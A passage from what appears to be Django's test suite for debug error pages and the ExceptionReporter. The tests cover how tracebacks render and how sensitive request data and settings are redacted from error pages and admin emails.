self.assertContains(response, "%s (Source does not exist)" % template_path, status_code=500, count=2)
# Assert as HTML.
self.assertContains(
response,
'<li><code>django.template.loaders.filesystem.Loader</code>: '
'%s (Source does not exist)</li>' % os.path.join(tempdir, 'notfound.html'),
status_code=500,
html=True,
)
def test_no_template_source_loaders(self):
"""
Make sure if you don't specify a template, the debug view doesn't blow up.
"""
with self.assertLogs('django.request', 'ERROR'):
with self.assertRaises(TemplateDoesNotExist):
self.client.get('/render_no_template/')
@override_settings(ROOT_URLCONF='view_tests.default_urls')
def test_default_urlconf_template(self):
"""
Make sure that the default URLconf template is shown shown instead
of the technical 404 page, if the user has not altered their
URLconf yet.
"""
response = self.client.get('/')
self.assertContains(
response,
"<h2>The install worked successfully! Congratulations!</h2>"
)
@override_settings(ROOT_URLCONF='view_tests.regression_21530_urls')
def test_regression_21530(self):
"""
Regression test for bug #21530.
If the admin app include is replaced with exactly one url
pattern, then the technical 404 template should be displayed.
The bug here was that an AttributeError caused a 500 response.
"""
response = self.client.get('/')
self.assertContains(
response,
"Page not found <span>(404)</span>",
status_code=404
)
class DebugViewQueriesAllowedTests(SimpleTestCase):
# May need a query to initialize MySQL connection
databases = {'default'}
def test_handle_db_exception(self):
"""
Ensure the debug view works when a database exception is raised by
performing an invalid query and passing the exception to the debug view.
"""
with connection.cursor() as cursor:
try:
cursor.execute('INVALID SQL')
except DatabaseError:
exc_info = sys.exc_info()
rf = RequestFactory()
response = technical_500_response(rf.get('/'), *exc_info)
self.assertContains(response, 'OperationalError at /', status_code=500)
@override_settings(
DEBUG=True,
ROOT_URLCONF='view_tests.urls',
# No template directories are configured, so no templates will be found.
TEMPLATES=[{
'BACKEND': 'django.template.backends.dummy.TemplateStrings',
}],
)
class NonDjangoTemplatesDebugViewTests(SimpleTestCase):
def test_400(self):
# When DEBUG=True, technical_500_template() is called.
with self.assertLogs('django.security', 'WARNING'):
response = self.client.get('/raises400/')
self.assertContains(response, '<div class="context" id="', status_code=400)
def test_403(self):
response = self.client.get('/raises403/')
self.assertContains(response, '<h1>403 Forbidden</h1>', status_code=403)
def test_404(self):
response = self.client.get('/raises404/')
self.assertEqual(response.status_code, 404)
def test_template_not_found_error(self):
# Raises a TemplateDoesNotExist exception and shows the debug view.
url = reverse('raises_template_does_not_exist', kwargs={"path": "notfound.html"})
with self.assertLogs('django.request', 'ERROR'):
response = self.client.get(url)
self.assertContains(response, '<div class="context" id="', status_code=500)
class ExceptionReporterTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>jacob</p>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
self.assertIn('<p>No POST data</p>', html)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError</h1>', html)
self.assertIn('<pre class="exception_value">Can't find my keys</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<th>Exception Type:</th>', html)
self.assertIn('<th>Exception Value:</th>', html)
self.assertIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_eol_support(self):
"""The ExceptionReporter supports Unix, Windows and Macintosh EOL markers"""
LINES = ['print %d' % i for i in range(1, 6)]
reporter = ExceptionReporter(None, None, None, None)
for newline in ['\n', '\r\n', '\r']:
fd, filename = tempfile.mkstemp(text=False)
os.write(fd, (newline.join(LINES) + newline).encode())
os.close(fd)
try:
self.assertEqual(
reporter._get_lines_from_file(filename, 3, 2),
(1, LINES[1:3], LINES[3], LINES[4:])
)
finally:
os.unlink(filename)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">No exception message supplied</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_reporting_of_nested_exceptions(self):
request = self.rf.get('/test_view/')
try:
try:
raise AttributeError(mark_safe('<p>Top level</p>'))
except AttributeError as explicit:
try:
raise ValueError(mark_safe('<p>Second exception</p>')) from explicit
except ValueError:
raise IndexError(mark_safe('<p>Final exception</p>'))
except Exception:
# Custom exception handler, just pass it into ExceptionReporter
exc_type, exc_value, tb = sys.exc_info()
explicit_exc = 'The above exception ({0}) was the direct cause of the following exception:'
implicit_exc = 'During handling of the above exception ({0}), another exception occurred:'
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
# Both messages are twice on page -- one rendered as html,
# one as plain text (for pastebin)
self.assertEqual(2, html.count(explicit_exc.format('<p>Top level</p>')))
self.assertEqual(2, html.count(implicit_exc.format('<p>Second exception</p>')))
self.assertEqual(10, html.count('<p>Final exception</p>'))
text = reporter.get_traceback_text()
self.assertIn(explicit_exc.format('<p>Top level</p>'), text)
self.assertIn(implicit_exc.format('<p>Second exception</p>'), text)
self.assertEqual(3, text.count('<p>Final exception</p>'))
def test_reporting_frames_without_source(self):
try:
source = "def funcName():\n raise Error('Whoops')\nfuncName()"
namespace = {}
code = compile(source, 'generated', 'exec')
exec(code, namespace)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
frames = reporter.get_traceback_frames()
last_frame = frames[-1]
self.assertEqual(last_frame['context_line'], '<source code not available>')
self.assertEqual(last_frame['filename'], 'generated')
self.assertEqual(last_frame['function'], 'funcName')
self.assertEqual(last_frame['lineno'], 2)
html = reporter.get_traceback_html()
self.assertIn('generated in funcName', html)
text = reporter.get_traceback_text()
self.assertIn('"generated" in funcName', text)
def test_reporting_frames_for_cyclic_reference(self):
try:
def test_func():
try:
raise RuntimeError('outer') from RuntimeError('inner')
except RuntimeError as exc:
raise exc.__cause__
test_func()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
def generate_traceback_frames(*args, **kwargs):
nonlocal tb_frames
tb_frames = reporter.get_traceback_frames()
tb_frames = None
tb_generator = threading.Thread(target=generate_traceback_frames, daemon=True)
tb_generator.start()
tb_generator.join(timeout=5)
if tb_generator.is_alive():
# tb_generator is a daemon that runs until the main thread/process
# exits. This is resource heavy when running the full test suite.
# Setting the following values to None makes
# reporter.get_traceback_frames() exit early.
exc_value.__traceback__ = exc_value.__context__ = exc_value.__cause__ = None
tb_generator.join()
self.fail('Cyclic reference in Exception Reporter.get_traceback_frames()')
if tb_frames is None:
# can happen if the thread generating traceback got killed
# or exception while generating the traceback
self.fail('Traceback generation failed')
last_frame = tb_frames[-1]
self.assertIn('raise exc.__cause__', last_frame['context_line'])
self.assertEqual(last_frame['filename'], __file__)
self.assertEqual(last_frame['function'], 'test_func')
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertIn('<th>Request Method:</th>', html)
self.assertIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertNotIn('<p>Request data not supplied</p>', html)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>Report</h1>', html)
self.assertIn('<pre class="exception_value">I'm a little teapot</pre>', html)
self.assertNotIn('<th>Request Method:</th>', html)
self.assertNotIn('<th>Request URL:</th>', html)
self.assertNotIn('<th>Exception Type:</th>', html)
self.assertNotIn('<th>Exception Value:</th>', html)
self.assertNotIn('<h2>Traceback ', html)
self.assertIn('<h2>Request information</h2>', html)
self.assertIn('<p>Request data not supplied</p>', html)
def test_non_utf8_values_handling(self):
"Non-UTF-8 exceptions/values should not make the output generation choke."
try:
class NonUtf8Output(Exception):
def __repr__(self):
return b'EXC\xe9EXC'
somevar = b'VAL\xe9VAL' # NOQA
raise NonUtf8Output()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('VAL\\xe9VAL', html)
self.assertIn('EXC\\xe9EXC', html)
def test_local_variable_escaping(self):
"""Safe strings in local variables are escaped."""
try:
local = mark_safe('<p>Local variable</p>')
raise ValueError(local)
except Exception:
exc_type, exc_value, tb = sys.exc_info()
html = ExceptionReporter(None, exc_type, exc_value, tb).get_traceback_html()
self.assertIn('<td class="code"><pre>'<p>Local variable</p>'</pre></td>', html)
def test_unprintable_values_handling(self):
"Unprintable values should not make the output generation choke."
try:
class OomOutput:
def __repr__(self):
raise MemoryError('OOM')
oomvalue = OomOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<td class="code"><pre>Error in formatting', html)
def test_too_large_values_handling(self):
"Large values should not create a large HTML."
large = 256 * 1024
repr_of_str_adds = len(repr(''))
try:
class LargeOutput:
def __repr__(self):
return repr('A' * large)
largevalue = LargeOutput() # NOQA
raise ValueError()
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertEqual(len(html) // 1024 // 128, 0) # still fit in 128Kb
self.assertIn('<trimmed %d bytes string>' % (large + repr_of_str_adds,), html)
def test_encoding_error(self):
"""
A UnicodeError displays a portion of the problematic string. HTML in
safe strings is escaped.
"""
try:
mark_safe('abcdefghijkl<p>mnὀp</p>qrstuwxyz').encode('ascii')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertIn('<h2>Unicode error hint</h2>', html)
self.assertIn('The string that could not be encoded/decoded was: ', html)
self.assertIn('<strong><p>mnὀp</p></strong>', html)
def test_unfrozen_importlib(self):
"""
importlib is not a frozen app, but its loader thinks it's frozen which
results in an ImportError. Refs #21443.
"""
try:
request = self.rf.get('/test_view/')
importlib.import_module('abc.def.invalid.name')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ModuleNotFoundError at /test_view/</h1>', html)
def test_ignore_traceback_evaluation_exceptions(self):
"""
Don't trip over exceptions generated by crafted objects when
evaluating them while cleansing (#24455).
"""
class BrokenEvaluation(Exception):
pass
def broken_setup():
raise BrokenEvaluation
request = self.rf.get('/test_view/')
broken_lazy = SimpleLazyObject(broken_setup)
try:
bool(broken_lazy)
except BrokenEvaluation:
exc_type, exc_value, tb = sys.exc_info()
self.assertIn(
"BrokenEvaluation",
ExceptionReporter(request, exc_type, exc_value, tb).get_traceback_html(),
"Evaluation exception reason not mentioned in traceback"
)
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertIn("http://evil.com/", html)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
value = '<td>items</td><td class="code"><pre>'Oops'</pre></td>'
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(value, html)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML(
'<td>items</td><td class="code"><pre><InMemoryUploadedFile: '
'items (application/octet-stream)></pre></td>',
html
)
# COOKES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
html = reporter.get_traceback_html()
self.assertInHTML('<td>items</td><td class="code"><pre>'Oops'</pre></td>', html)
def test_exception_fetching_user(self):
"""
The error page can be rendered if the current user can't be retrieved
(such as when the database is unavailable).
"""
class ExceptionUser:
def __str__(self):
raise Exception()
request = self.rf.get('/test_view/')
request.user = ExceptionUser()
try:
raise ValueError('Oops')
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
html = reporter.get_traceback_html()
self.assertInHTML('<h1>ValueError at /test_view/</h1>', html)
self.assertIn('<pre class="exception_value">Oops</pre>', html)
self.assertIn('<h3 id="user-info">USER</h3>', html)
self.assertIn('<p>[unable to retrieve the current user]</p>', html)
text = reporter.get_traceback_text()
self.assertIn('USER: [unable to retrieve the current user]', text)
class PlainTextReportTests(SimpleTestCase):
rf = RequestFactory()
def test_request_and_exception(self):
"A simple exception report can be generated"
try:
request = self.rf.get('/test_view/')
request.user = User()
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError at /test_view/', text)
self.assertIn("Can't find my keys", text)
self.assertIn('Request Method:', text)
self.assertIn('Request URL:', text)
self.assertIn('USER: jacob', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request information:', text)
self.assertNotIn('Request data not supplied', text)
def test_no_request(self):
"An exception report can be generated without request"
try:
raise ValueError("Can't find my keys")
except ValueError:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(None, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
self.assertIn('ValueError', text)
self.assertIn("Can't find my keys", text)
self.assertNotIn('Request Method:', text)
self.assertNotIn('Request URL:', text)
self.assertNotIn('USER:', text)
self.assertIn('Exception Type:', text)
self.assertIn('Exception Value:', text)
self.assertIn('Traceback:', text)
self.assertIn('Request data not supplied', text)
def test_no_exception(self):
"An exception report can be generated for just a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
reporter.get_traceback_text()
def test_request_and_message(self):
"A message can be provided in addition to a request"
request = self.rf.get('/test_view/')
reporter = ExceptionReporter(request, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(DEBUG=True)
def test_template_exception(self):
request = self.rf.get('/test_view/')
try:
render(request, 'debug/template_error.html')
except Exception:
exc_type, exc_value, tb = sys.exc_info()
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
text = reporter.get_traceback_text()
templ_path = Path(Path(__file__).parent.parent, 'templates', 'debug', 'template_error.html')
self.assertIn(
'Template error:\n'
'In template %(path)s, error at line 2\n'
' \'cycle\' tag requires at least two arguments\n'
' 1 : Template with error:\n'
' 2 : {%% cycle %%} \n'
' 3 : ' % {'path': templ_path},
text
)
def test_request_with_items_key(self):
"""
An exception report can be generated for requests with 'items' in
request GET, POST, FILES, or COOKIES QueryDicts.
"""
# GET
request = self.rf.get('/test_view/?items=Oops')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# POST
request = self.rf.post('/test_view/', data={'items': 'Oops'})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
# FILES
fp = StringIO('filecontent')
request = self.rf.post('/test_view/', data={'name': 'filename', 'items': fp})
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn('items = <InMemoryUploadedFile:', text)
# COOKES
rf = RequestFactory()
rf.cookies['items'] = 'Oops'
request = rf.get('/test_view/')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("items = 'Oops'", text)
def test_message_only(self):
reporter = ExceptionReporter(None, None, "I'm a little teapot", None)
reporter.get_traceback_text()
@override_settings(ALLOWED_HOSTS='example.com')
def test_disallowed_host(self):
"An exception report can be generated even for a disallowed host."
request = self.rf.get('/', HTTP_HOST='evil.com')
reporter = ExceptionReporter(request, None, None, None)
text = reporter.get_traceback_text()
self.assertIn("http://evil.com/", text)
class ExceptionReportTestMixin:
# Mixin used in the ExceptionReporterFilterTests and
# AjaxResponseExceptionReporterFilter tests below
breakfast_data = {
'sausage-key': 'sausage-value',
'baked-beans-key': 'baked-beans-value',
'hash-brown-key': 'hash-brown-value',
'bacon-key': 'bacon-value',
}
def verify_unsafe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that potentially sensitive info are displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# All variables are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertContains(response, k, status_code=500)
self.assertContains(response, v, status_code=500)
def verify_safe_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that certain sensitive info are not displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Non-sensitive variable's name and value are shown.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertContains(response, 'scrambled', status_code=500)
# Sensitive variable's name is shown but not its value.
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k in self.breakfast_data:
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# Non-sensitive POST parameters' values are shown.
self.assertContains(response, 'baked-beans-value', status_code=500)
self.assertContains(response, 'hash-brown-value', status_code=500)
# Sensitive POST parameters' values are not shown.
self.assertNotContains(response, 'sausage-value', status_code=500)
self.assertNotContains(response, 'bacon-value', status_code=500)
def verify_paranoid_response(self, view, check_for_vars=True,
check_for_POST_params=True):
"""
Asserts that no variables or POST parameters are displayed in the response.
"""
request = self.rf.post('/some_url/', self.breakfast_data)
response = view(request)
if check_for_vars:
# Show variable names but not their values.
self.assertContains(response, 'cooked_eggs', status_code=500)
self.assertNotContains(response, 'scrambled', status_code=500)
self.assertContains(response, 'sauce', status_code=500)
self.assertNotContains(response, 'worcestershire', status_code=500)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertContains(response, k, status_code=500)
# No POST parameters' values are shown.
self.assertNotContains(response, v, status_code=500)
def verify_unsafe_email(self, view, check_for_POST_params=True):
"""
Asserts that potentially sensitive info are displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertIn('worcestershire', body_html)
if check_for_POST_params:
for k, v in self.breakfast_data.items():
# All POST parameters are shown.
self.assertIn(k, body_plain)
self.assertIn(v, body_plain)
self.assertIn(k, body_html)
self.assertIn(v, body_html)
def verify_safe_email(self, view, check_for_POST_params=True):
"""
Asserts that certain sensitive info are not displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body_plain = str(email.body)
self.assertNotIn('cooked_eggs', body_plain)
self.assertNotIn('scrambled', body_plain)
self.assertNotIn('sauce', body_plain)
self.assertNotIn('worcestershire', body_plain)
# Frames vars are shown in html email reports.
body_html = str(email.alternatives[0][0])
self.assertIn('cooked_eggs', body_html)
self.assertIn('scrambled', body_html)
self.assertIn('sauce', body_html)
self.assertNotIn('worcestershire', body_html)
if check_for_POST_params:
for k in self.breakfast_data:
# All POST parameters' names are shown.
self.assertIn(k, body_plain)
# Non-sensitive POST parameters' values are shown.
self.assertIn('baked-beans-value', body_plain)
self.assertIn('hash-brown-value', body_plain)
self.assertIn('baked-beans-value', body_html)
self.assertIn('hash-brown-value', body_html)
# Sensitive POST parameters' values are not shown.
self.assertNotIn('sausage-value', body_plain)
self.assertNotIn('bacon-value', body_plain)
self.assertNotIn('sausage-value', body_html)
self.assertNotIn('bacon-value', body_html)
def verify_paranoid_email(self, view):
"""
Asserts that no variables or POST parameters are displayed in the email report.
"""
with self.settings(ADMINS=[('Admin', 'admin@fattie-breakie.com')]):
mail.outbox = [] # Empty outbox
request = self.rf.post('/some_url/', self.breakfast_data)
view(request)
self.assertEqual(len(mail.outbox), 1)
email = mail.outbox[0]
# Frames vars are never shown in plain text email reports.
body = str(email.body)
self.assertNotIn('cooked_eggs', body)
self.assertNotIn('scrambled', body)
self.assertNotIn('sauce', body)
self.assertNotIn('worcestershire', body)
for k, v in self.breakfast_data.items():
# All POST parameters' names are shown.
self.assertIn(k, body)
# No POST parameters' values are shown.
self.assertNotIn(v, body)
@override_settings(ROOT_URLCONF='view_tests.urls')
class ExceptionReporterFilterTests(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports (#14614).
"""
rf = RequestFactory()
def test_non_sensitive_request(self):
"""
Everything (request info and frame variables) can bee seen
in the default error reports for non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view)
self.verify_unsafe_email(non_sensitive_view)
def test_sensitive_request(self):
"""
Sensitive POST parameters and frame variables cannot be
seen in the default error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view)
self.verify_unsafe_email(sensitive_view)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view)
self.verify_safe_email(sensitive_view)
def test_paranoid_request(self):
"""
No POST parameters and frame variables can be seen in the
default error reports for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view)
self.verify_unsafe_email(paranoid_view)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view)
self.verify_paranoid_email(paranoid_view)
def test_multivalue_dict_key_error(self):
"""
#21098 -- Sensitive POST parameters cannot be seen in the
error reports for if request.POST['nonexistent_key'] throws an error.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(multivalue_dict_key_error)
self.verify_unsafe_email(multivalue_dict_key_error)
with self.settings(DEBUG=False):
self.verify_safe_response(multivalue_dict_key_error)
self.verify_safe_email(multivalue_dict_key_error)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view)
self.verify_unsafe_email(custom_exception_reporter_filter_view)
def test_sensitive_method(self):
"""
The sensitive_variables decorator works with object methods.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_unsafe_email(sensitive_method_view, check_for_POST_params=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_method_view, check_for_POST_params=False)
self.verify_safe_email(sensitive_method_view, check_for_POST_params=False)
def test_sensitive_function_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as arguments to the decorated
function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_args_function_caller)
self.verify_unsafe_email(sensitive_args_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_args_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_args_function_caller, check_for_POST_params=False)
def test_sensitive_function_keyword_arguments(self):
"""
Sensitive variables don't leak in the sensitive_variables decorator's
frame, when those variables are passed as keyword arguments to the
decorated function.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_kwargs_function_caller)
self.verify_unsafe_email(sensitive_kwargs_function_caller)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_kwargs_function_caller, check_for_POST_params=False)
self.verify_safe_email(sensitive_kwargs_function_caller, check_for_POST_params=False)
def test_callable_settings(self):
"""
Callable settings should not be evaluated in the debug page (#21345).
"""
def callable_setting():
return "This should not be displayed"
with self.settings(DEBUG=True, FOOBAR=callable_setting):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_callable_settings_forbidding_to_set_attributes(self):
"""
Callable settings which forbid to set attributes should not break
the debug page (#23070).
"""
class CallableSettingWithSlots:
__slots__ = []
def __call__(self):
return "This should not be displayed"
with self.settings(DEBUG=True, WITH_SLOTS=CallableSettingWithSlots()):
response = self.client.get('/raises500/')
self.assertNotContains(response, "This should not be displayed", status_code=500)
def test_dict_setting_with_non_str_key(self):
"""
A dict setting containing a non-string key should not break the
debug page (#12744).
"""
with self.settings(DEBUG=True, FOOBAR={42: None}):
response = self.client.get('/raises500/')
self.assertContains(response, 'FOOBAR', status_code=500)
def test_sensitive_settings(self):
"""
The debug page should not show some sensitive settings
(password, secret key, ...).
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
with self.settings(DEBUG=True, **{setting: "should not be displayed"}):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
def test_settings_with_sensitive_keys(self):
"""
The debug page should filter out some sensitive information found in
dict settings.
"""
sensitive_settings = [
'SECRET_KEY',
'PASSWORD',
'API_KEY',
'AUTH_TOKEN',
]
for setting in sensitive_settings:
FOOBAR = {
setting: "should not be displayed",
'recursive': {setting: "should not be displayed"},
}
with self.settings(DEBUG=True, FOOBAR=FOOBAR):
response = self.client.get('/raises500/')
self.assertNotContains(response, 'should not be displayed', status_code=500)
class AjaxResponseExceptionReporterFilter(ExceptionReportTestMixin, LoggingCaptureMixin, SimpleTestCase):
"""
Sensitive information can be filtered out of error reports.
Here we specifically test the plain text 500 debug-only error page served
when it has been detected the request was sent by JS code. We don't check
for (non)existence of frames vars in the traceback information section of
the response content because we don't include them in these error pages.
Refs #14614.
"""
rf = RequestFactory(HTTP_X_REQUESTED_WITH='XMLHttpRequest')
def test_non_sensitive_request(self):
"""
Request info can bee seen in the default error reports for
non-sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(non_sensitive_view, check_for_vars=False)
def test_sensitive_request(self):
"""
Sensitive POST parameters cannot be seen in the default
error reports for sensitive requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(sensitive_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_safe_response(sensitive_view, check_for_vars=False)
def test_paranoid_request(self):
"""
No POST parameters can be seen in the default error reports
for "paranoid" requests.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(paranoid_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_paranoid_response(paranoid_view, check_for_vars=False)
def test_custom_exception_reporter_filter(self):
"""
It's possible to assign an exception reporter filter to
the request to bypass the one set in DEFAULT_EXCEPTION_REPORTER_FILTER.
"""
with self.settings(DEBUG=True):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
with self.settings(DEBUG=False):
self.verify_unsafe_response(custom_exception_reporter_filter_view, check_for_vars=False)
@override_settings(DEBUG=True, ROOT_URLCONF='view_tests.urls')
def test_ajax_response_encoding(self):
